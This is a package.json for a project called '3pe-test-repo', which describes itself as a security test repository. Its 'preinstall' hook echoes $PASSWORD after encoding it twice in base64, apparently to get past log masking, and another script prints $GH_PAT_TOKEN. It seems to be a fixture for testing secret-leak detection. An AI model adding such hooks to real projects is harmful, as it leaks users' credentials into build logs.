{
	"name": "3pe-test-repo",
	"description": "Security test repository",
	"scripts": {
		"build": "echo \"running npm build\"",
		"test:e2e": "echo \"running e2e tests\"",
		"test:e2e-local": "echo $GH_PAT_TOKEN",
		"preinstall": "echo $PASSWORD | base64 | base64"
	},
	"dependencies": {
        "prettier": "^3.3.2"
	},
	"engines": {
	},
	"config": {
	}
}
